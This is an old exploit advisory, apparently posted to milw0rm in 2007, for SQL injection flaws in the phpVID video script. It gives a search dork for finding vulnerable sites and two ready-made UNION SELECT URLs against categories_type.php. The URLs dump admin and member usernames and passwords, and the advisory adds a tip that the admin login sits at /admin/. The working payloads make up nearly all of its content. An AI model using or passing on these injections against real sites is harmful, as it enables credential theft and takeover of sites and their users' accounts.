33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
--==+================================================================================+==--
|
|
--==+ phpVID SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: http://www.vastal.com/
|
|
DORK: browse_videos.php?
|
|
|
|
|
|
DESCRIPTION:
|
|
pull out multiple admin/users at the same time.
|
|
|
|
|
|
EXPLOITS:
|
|
http://www.server.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(admin_user,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/admin_users/*
|
|
http://www.server.com/categories_type.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/members/*
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
administrator login is at /admin/
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ phpVID SQL Injection Vulnerbilitys +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-06] |